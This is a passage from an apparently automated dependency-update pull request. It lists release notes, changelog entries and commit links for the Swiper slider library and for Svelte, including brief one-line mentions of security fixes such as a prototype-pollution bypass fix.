href=\"https://github.com/nolimits4web/Swiper/commit/332f5c77005921c8a260f199cdfe6d3aa5d209a1\"\u003e332f5c7\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8149\"\u003e#8149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ethumbs:\u003c/strong\u003e update slide classes on virtual swiper update (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8141\"\u003e#8141\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/975277111b73f389043cb0ed19feee0244a80f57\"\u003e9752771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e Add \u003ccode\u003eautoScroll\u003c/code\u003e to \u003ccode\u003ethumbs.update\u003c/code\u003e type signature (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8146\"\u003e#8146\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/5d91e6edb4ce35d70019616b51f1e380feb9a082\"\u003e5d91e6e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ezoom:\u003c/strong\u003e initialize gesture state after programmatic zoom (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8112\"\u003e#8112\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/71e9511802c34482bc8b66abda19a1a518d88d36\"\u003e71e9511\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ekeyboard:\u003c/strong\u003e add support for custom speed parameter in keyboard navigation (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8148\"\u003e#8148\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/7a4a0e5fc3c85710a37ab021328e083fc3b14e16\"\u003e7a4a0e5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003enew snapToSlideEdge parameter (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/de3131fbf72cccbf1d1473f787ddf15c74612584\"\u003ede3131f\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8021\"\u003e#8021\u003c/a\u003e \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/4780\"\u003e#4780\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.3\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eelement:\u003c/strong\u003e fixed reference to nav arrows SVG (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/0b17ecf56bf941e4a5da2a2c171d5e16a9e4552b\"\u003e0b17ecf\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8115\"\u003e#8115\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e add 'getRotateFix' export to effect utils (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/c97ae5d0069cf3d5c745efb63ced9924a64d2453\"\u003ec97ae5d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8114\"\u003e#8114\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.2\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enavigation:\u003c/strong\u003e add styles for when buttons set before slider (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/4588c5719d4d828548c34f456de099f621f4c709\"\u003e4588c57\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8085\"\u003e#8085\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003enavigation:\u003c/strong\u003e new \u003ccode\u003eaddIcons\u003c/code\u003e parameter to add SVG icons to nav buttons (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/b955b0c15c3b813bbda7a68cdd250f8a822015df\"\u003eb955b0c\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8088\"\u003e#8088\u003c/a\u003e \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8087\"\u003e#8087\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.1\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enavigation:\u003c/strong\u003e tweak nav styles when adjacent (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/98440d9621c2b06c1c45edf8f4103ce5125e8231\"\u003e98440d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.0.0\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nolimits4web/swiper/blob/master/CHANGELOG.md\"\u003eswiper's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v12.1.1...v12.1.3\"\u003e12.1.3\u003c/a\u003e (2026-03-24)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e use virtual slides count in onResize when virtual mode is enabled (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8163\"\u003e#8163\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/44000834d05ac339a9c4dfbaaa3f60c1a0631cff\"\u003e4400083\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003egrid:\u003c/strong\u003e round down \u003ccode\u003eslidesPerView\u003c/code\u003e before calculating number of slides (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8172\"\u003e#8172\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/49a55ab2c89c63679cdd21d389ec7ef9d9d375f4\"\u003e49a55ab\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eelement:\u003c/strong\u003e add navigation button slots (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/cc8224177d5f577b672e37b9386f7388d71ba3c3\"\u003ecc82241\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v12.1.0...v12.1.1\"\u003e12.1.1\u003c/a\u003e (2026-02-13)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ea11y:\u003c/strong\u003e fix focus in virtual mode enabled (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/30550088fd089600aec2d7f8924b88cff13abbe9\"\u003e3055008\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8147\"\u003e#8147\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e avoid double-subtracting offsets in centerInsufficientSlides (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8158\"\u003e#8158\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/60b005222a801029a4a00d319517028afba7af18\"\u003e60b0052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e prevent duplicate module initialization in constructor (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8155\"\u003e#8155\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8156\"\u003e#8156\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/07738a233b70535c36126c5b579f2bb40049da6c\"\u003e07738a2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e support boolean as a11y value (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8157\"\u003e#8157\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/6bf76d573196c61db1328350c11e2c44f5d3ec08\"\u003e6bf76d5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v12.0.3...v12.1.0\"\u003e12.1.0\u003c/a\u003e (2026-01-28)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eautoplay:\u003c/strong\u003e broken custom delay percentages with pause/resume (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8133\"\u003e#8133\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/0afecde9781268a60a92f752ea3a3a92420e2dcf\"\u003e0afecde\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e Don't use \u003ccode\u003edata-swiper-slide-index\u003c/code\u003e for \u003ccode\u003erealIndex\u003c/code\u003e when virtual module is enabled (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8142\"\u003e#8142\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/bd957f8396f711b83dc1bc6b3d42a59e6d6539d2\"\u003ebd957f8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e Escape all CSS selector special characters (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/d35f41a85bd1793de58358d06300440e09187a6d\"\u003ed35f41a\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8135\"\u003e#8135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e support slidesOffsetBefore and slidesOffsetAfert in cssMode (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/45b98d02b2235b0c425f8bd60ebdc04d7b1a4fbd\"\u003e45b98d0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/7926\"\u003e#7926\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix lazy preloader removal error in react in vue (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/332f5c77005921c8a260f199cdfe6d3aa5d209a1\"\u003e332f5c7\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8149\"\u003e#8149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ethumbs:\u003c/strong\u003e update slide classes on virtual swiper update (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8141\"\u003e#8141\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/975277111b73f389043cb0ed19feee0244a80f57\"\u003e9752771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e Add \u003ccode\u003eautoScroll\u003c/code\u003e to \u003ccode\u003ethumbs.update\u003c/code\u003e type signature (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8146\"\u003e#8146\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/5d91e6edb4ce35d70019616b51f1e380feb9a082\"\u003e5d91e6e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ezoom:\u003c/strong\u003e initialize gesture state after programmatic zoom (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8112\"\u003e#8112\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/71e9511802c34482bc8b66abda19a1a518d88d36\"\u003e71e9511\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ekeyboard:\u003c/strong\u003e add support for custom speed parameter in keyboard navigation (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8148\"\u003e#8148\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/7a4a0e5fc3c85710a37ab021328e083fc3b14e16\"\u003e7a4a0e5\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003enew snapToSlideEdge parameter (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/de3131fbf72cccbf1d1473f787ddf15c74612584\"\u003ede3131f\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8021\"\u003e#8021\u003c/a\u003e \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/4780\"\u003e#4780\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v12.0.2...v12.0.3\"\u003e12.0.3\u003c/a\u003e (2025-10-21)\u003c/h1\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eelement:\u003c/strong\u003e fixed reference to nav arrows SVG (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/0b17ecf56bf941e4a5da2a2c171d5e16a9e4552b\"\u003e0b17ecf\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8115\"\u003e#8115\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e add 'getRotateFix' export to effect utils (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/c97ae5d0069cf3d5c745efb63ced9924a64d2453\"\u003ec97ae5d\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8114\"\u003e#8114\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/2fd88b718b6854e8d6be7f183e68b73b68dae816\"\u003e\u003ccode\u003e2fd88b7\u003c/code\u003e\u003c/a\u003e 12.1.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/d3e663322a13043ca63aaba235d8cf3900e0c8cf\"\u003e\u003ccode\u003ed3e6633\u003c/code\u003e\u003c/a\u003e fix prototype pollution bypass in extend() util\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/70c48c16f99affa29236ac13b16a37f43da38ae0\"\u003e\u003ccode\u003e70c48c1\u003c/code\u003e\u003c/a\u003e 12.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/30550088fd089600aec2d7f8924b88cff13abbe9\"\u003e\u003ccode\u003e3055008\u003c/code\u003e\u003c/a\u003e fix(a11y): fix focus in virtual mode enabled\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/60b005222a801029a4a00d319517028afba7af18\"\u003e\u003ccode\u003e60b0052\u003c/code\u003e\u003c/a\u003e fix(core): avoid double-subtracting offsets in centerInsufficientSlides (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8158\"\u003e#8158\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/6bf76d573196c61db1328350c11e2c44f5d3ec08\"\u003e\u003ccode\u003e6bf76d5\u003c/code\u003e\u003c/a\u003e fix(types): support boolean as a11y value (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8157\"\u003e#8157\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/07738a233b70535c36126c5b579f2bb40049da6c\"\u003e\u003ccode\u003e07738a2\u003c/code\u003e\u003c/a\u003e fix(core): prevent duplicate module initialization in constructor (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8155\"\u003e#8155\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8\"\u003e#8\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/3a1777aa7aefe168eac330f308cedd8c3f4a81e4\"\u003e\u003ccode\u003e3a1777a\u003c/code\u003e\u003c/a\u003e 12.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/3bc6cfe55421053864f6f53494841959748f332a\"\u003e\u003ccode\u003e3bc6cfe\u003c/code\u003e\u003c/a\u003e 12.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nolimits4web/swiper/commit/45b98d02b2235b0c425f8bd60ebdc04d7b1a4fbd\"\u003e\u003ccode\u003e45b98d0\u003c/code\u003e\u003c/a\u003e fix(core): support slidesOffsetBefore and slidesOffsetAfert in cssMode\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nolimits4web/Swiper/compare/v11.1.0...v12.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svelte` from 4.2.12 to 5.53.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.53.5\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: escape \u003ccode\u003einnerText\u003c/code\u003e and \u003ccode\u003etextContent\u003c/code\u003e bindings of \u003ccode\u003econtenteditable\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/commit/0df5abcae223058ceb95491470372065fb87951d\"\u003e\u003ccode\u003e0df5abcae223058ceb95491470372065fb87951d\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: sanitize \u003ccode\u003etransformError\u003c/code\u003e values prior to embedding in HTML comments (\u003ca href=\"https://github.com/sveltejs/svelte/commit/0298e979371bb583855c9810db79a70a551d22b9\"\u003e\u003ccode\u003e0298e979371bb583855c9810db79a70a551d22b9\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: set server context after async transformError (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17799\"\u003e#17799\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: hydrate if blocks correctly (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17784\"\u003e#17784\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: handle default parameters scope leaks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17788\"\u003e#17788\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: prevent flushed effects from running again (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17787\"\u003e#17787\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: render \u003ccode\u003e:catch\u003c/code\u003e of \u003ccode\u003e#await\u003c/code\u003e block with correct key (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17769\"\u003e#17769\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: pin aria-query@5.3.1 (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17772\"\u003e#17772\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make string coercion consistent to \u003ccode\u003etoString\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17774\"\u003e#17774\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: update expressions on server deriveds (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17767\"\u003e#17767\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: further obfuscate \u003ccode\u003enode:crypto\u003c/code\u003e import from overzealous static analysis (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17763\"\u003e#17763\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: handle shadowed function names correctly (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17753\"\u003e#17753\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.53.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efeat: allow comments in tags (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17671\"\u003e#17671\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efeat: allow error boundaries to work on the server (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17672\"\u003e#17672\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: use TrustedHTML to test for customizable \u003c!-- raw HTML omitted --\u003e support, where necessary (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17743\"\u003e#17743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.53.5\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: escape \u003ccode\u003einnerText\u003c/code\u003e and \u003ccode\u003etextContent\u003c/code\u003e bindings of \u003ccode\u003econtenteditable\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/commit/0df5abcae223058ceb95491470372065fb87951d\"\u003e\u003ccode\u003e0df5abcae223058ceb95491470372065fb87951d\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: sanitize \u003ccode\u003etransformError\u003c/code\u003e values prior to embedding in HTML comments (\u003ca href=\"https://github.com/sveltejs/svelte/commit/0298e979371bb583855c9810db79a70a551d22b9\"\u003e\u003ccode\u003e0298e979371bb583855c9810db79a70a551d22b9\u003c/code\u003e\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: set server context after async transformError (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17799\"\u003e#17799\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: hydrate if blocks correctly (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17784\"\u003e#17784\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: handle default parameters scope leaks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17788\"\u003e#17788\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: prevent flushed effects from running again (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17787\"\u003e#17787\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: render \u003ccode\u003e:catch\u003c/code\u003e of \u003ccode\u003e#await\u003c/code\u003e block with correct key (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17769\"\u003e#17769\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: pin aria-query@5.3.1 (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17772\"\u003e#17772\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make string coercion consistent to \u003ccode\u003etoString\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17774\"\u003e#17774\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: update expressions on server deriveds (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17767\"\u003e#17767\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: further obfuscate \u003ccode\u003enode:crypto\u003c/code\u003e import from overzealous static analysis (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17763\"\u003e#17763\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: handle shadowed function names correctly (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17753\"\u003e#17753\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.53.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: allow comments in tags (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/17671\"\u003e#17671\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ed14b499d6ea6821b5e8f81a723164eb8198dfa9\"\u003e\u003ccode\u003eed14b49\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/17802\"\u003e#17802\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0df5abcae223058ceb95491470372065fb87951d\"\u003e\u003ccode\u003e0df5abc\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0298e979371bb583855c9810db79a70a551d22b9\"\u003e\u003ccode\u003e0298e97\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca 